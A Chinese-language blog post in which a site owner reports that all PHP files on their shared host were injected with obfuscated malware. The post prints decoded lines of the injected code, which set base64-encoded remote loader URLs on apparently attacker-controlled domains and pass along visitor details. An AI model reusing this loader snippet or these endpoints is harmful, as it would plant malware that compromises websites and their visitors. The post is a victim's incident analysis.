English
中文 这两天准备更新下本博客的评论,加上诸如评论啦、多说等插件,发现某些php文件貌似不太对劲。今天又收到了google的名为“Malware notification regarding tanglei.name”的邮件,再进博客后台,发现博客所有的php文件被感染,诸如下图一些加密代码。用chrome访问博客时也被拦截,提示“警告:此页面包含危险内容!www.tanglei.name 包含恶意软件。如果您访问此网站,您的计算机可能会中毒。……”
植入木马
再SSH进入主机,发现该主机下其他域名的所有的php文件都植入了这些代码。如图所示,我的i3zhai.com也中招了.
base64解码以上植入的恶意代码,发现以上恶意代码跟目标主机相关联的关键的几行代码:
$_SERVER['s_p1']=$mz; $_SERVER['s_b1']=$bot; $_SERVER['s_t1']=1200; $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8='); $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]); $_SERVER['s_a1']=base64_decode('aHR0cDovL3BtZ2N6a2luZml1bS5ydS9nX2xvYWQucGhw').$d; $_SERVER['s_a2']=base64_decode('aHR0cDovL2luZmlwbWcucnUvZ19sb2FkLnBocA==').$d; $_SERVER['s_script']="pmg.php?d=x"; |
关键url还得base64解码,得到的url如下:
http://pmgczkinfium.ru/g_load.php http://infipmg.ru/g_load.php http://ens122zzzddazz.com/ |
看来就是跟这些相关了。查了这几个url,发现也有其他站点中招了。
目前我能想到的解决方案就是写个脚本,在后台跑一下,把所有php中这些代码都删除掉。不过这个有风险啊,一是不知道后台允许我执行这样的脚本么,而是操作这些代码要是有个什么差错的话就惨了。目前联系了主机提供商,看看他们有什么解决方案。
暂且就不管了吧。如果你现在能看到这篇文章就是忽略浏览器的拦截了。呵呵。待解决……
